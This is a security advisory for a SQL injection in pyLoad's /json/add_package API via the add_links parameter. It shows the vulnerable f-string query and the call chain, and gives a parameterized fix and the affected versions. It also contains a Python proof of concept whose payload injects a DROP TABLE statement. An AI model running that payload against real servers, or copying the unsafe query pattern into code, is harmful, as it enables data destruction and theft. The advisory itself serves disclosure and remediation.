GHSA-pwh4-6r3m-j2rf

Suggest an improvement
Source
https://github.com/advisories/GHSA-pwh4-6r3m-j2rf
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-pwh4-6r3m-j2rf/GHSA-pwh4-6r3m-j2rf.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-pwh4-6r3m-j2rf
Aliases
Published
2025-08-12T00:13:46Z
Modified
2025-08-12T13:45:21.009953Z
Severity
  • 7.8 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P CVSS Calculator
Summary
PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter
Details

Summary

The parameter add_links in the API /json/add_package is vulnerable to SQL Injection. SQL injection vulnerabilities can lead to sensitive data leakage.

Details

  • Affected file:https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271

  • Affected code:

    @style.queue
    def update_link_info(self, data):
        """
        data is list of tuples (name, size, status, url)
        """
        self.c.executemany(
            "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)",
            data,
        )
        ids = []
        statuses = "','".join(x[3] for x in data)
        self.c.execute(f"SELECT id FROM links WHERE url IN ('{statuses}')")
        for r in self.c:
            ids.append(int(r[0]))
        return ids

    statuses is constructed from data, and data is the value of the addlinks parameter entered by the user through /json/addpackge. Because {statuses} is directly spliced into the SQL statement, it leads to the SQL injection vulnerability.

  • Vulnerability Chain

    josn_blueprint.py#add_package
src/pyload/core/api/__init__.py#add_package
src/pyload/core/managers/file_manager.py#add_links
src/pyload/core/threads/info_thread.py#run
src/pyload/core/threads/info_thread.py#update_info
src/pyload/core/managers/file_manager.py#update_file_info
src/pyload/core/database/file_database.py#update_link_info

PoC

import requests


if __name__ == "__main__":
    url = "http://localhost:8000/json/add_package"
    data = {
        "add_name": "My Downloads1",
        "add_dest": "0",
        "add_links": "https://www.dailymotion.com/video/x8zzzzz') or 1; Drop table users;--",
        "add_password": "mypassword"
    }

    response = requests.post(url, cookies=your_cookies, data=data)
    print(response.status_code, response.text)

<img width="1599" height="827" alt="image" src="https://github.com/user-attachments/assets/9bdcef37-59b8-4e60-a2b5-beb8a88c3202" />

Remediation

```python def updatelinkinfo(self, data): """ data is list of tuples (name, size, status, url) """ self.c.executemany( "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)", data, )

# 提取所有url
urls = [x[3] for x in data]

# 构建参数化查询,避免SQL注入
placeholders = ','.join(['?'] * len(urls))
query = f"SELECT id FROM links WHERE url IN ({placeholders}) AND status IN (1,2,3,14)"
self.c.execute(query, urls)

ids = [int(row[0]) for row in self.c.fetchall()]
return ids

```

Impact

Attackers can modify or delete data in the database, causing data errors or loss.

Database specific 
{
    "nvd_published_at": "2025-08-11T23:15:26Z",
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-12T00:13:46Z",
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-89"
    ]
}
References

Affected packages

PyPI / pyload-ng

Package

Name
pyload-ng
View open source insights on deps.dev
Purl
pkg:pypi/pyload-ng

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.5.0b3.dev91

Affected versions

0.*

0.5.0a5.dev528
0.5.0a5.dev532
0.5.0a5.dev535
0.5.0a5.dev536
0.5.0a5.dev537
0.5.0a5.dev539
0.5.0a5.dev540
0.5.0a5.dev545
0.5.0a5.dev562
0.5.0a5.dev564
0.5.0a5.dev565
0.5.0a6.dev570
0.5.0a6.dev578
0.5.0a6.dev587
0.5.0a7.dev596
0.5.0a8.dev602
0.5.0a9.dev615
0.5.0a9.dev629
0.5.0a9.dev632
0.5.0a9.dev641
0.5.0a9.dev643
0.5.0a9.dev655
0.5.0a9.dev806
0.5.0b1.dev1
0.5.0b1.dev2
0.5.0b1.dev3
0.5.0b1.dev4
0.5.0b1.dev5
0.5.0b2.dev9
0.5.0b2.dev10
0.5.0b2.dev11
0.5.0b2.dev12
0.5.0b3.dev13
0.5.0b3.dev14
0.5.0b3.dev17
0.5.0b3.dev18
0.5.0b3.dev19
0.5.0b3.dev20
0.5.0b3.dev21
0.5.0b3.dev22
0.5.0b3.dev24
0.5.0b3.dev26
0.5.0b3.dev27
0.5.0b3.dev28
0.5.0b3.dev29
0.5.0b3.dev30
0.5.0b3.dev31
0.5.0b3.dev32
0.5.0b3.dev33
0.5.0b3.dev34
0.5.0b3.dev35
0.5.0b3.dev38
0.5.0b3.dev39
0.5.0b3.dev40
0.5.0b3.dev41
0.5.0b3.dev42
0.5.0b3.dev43
0.5.0b3.dev44
0.5.0b3.dev45
0.5.0b3.dev46
0.5.0b3.dev47
0.5.0b3.dev48
0.5.0b3.dev49
0.5.0b3.dev50
0.5.0b3.dev51
0.5.0b3.dev52
0.5.0b3.dev53
0.5.0b3.dev54
0.5.0b3.dev57
0.5.0b3.dev60
0.5.0b3.dev62
0.5.0b3.dev64
0.5.0b3.dev65
0.5.0b3.dev66
0.5.0b3.dev67
0.5.0b3.dev68
0.5.0b3.dev69
0.5.0b3.dev70
0.5.0b3.dev71
0.5.0b3.dev72
0.5.0b3.dev73
0.5.0b3.dev74
0.5.0b3.dev75
0.5.0b3.dev76
0.5.0b3.dev77
0.5.0b3.dev78
0.5.0b3.dev79
0.5.0b3.dev80
0.5.0b3.dev81
0.5.0b3.dev82
0.5.0b3.dev85
0.5.0b3.dev87
0.5.0b3.dev88
0.5.0b3.dev89
0.5.0b3.dev90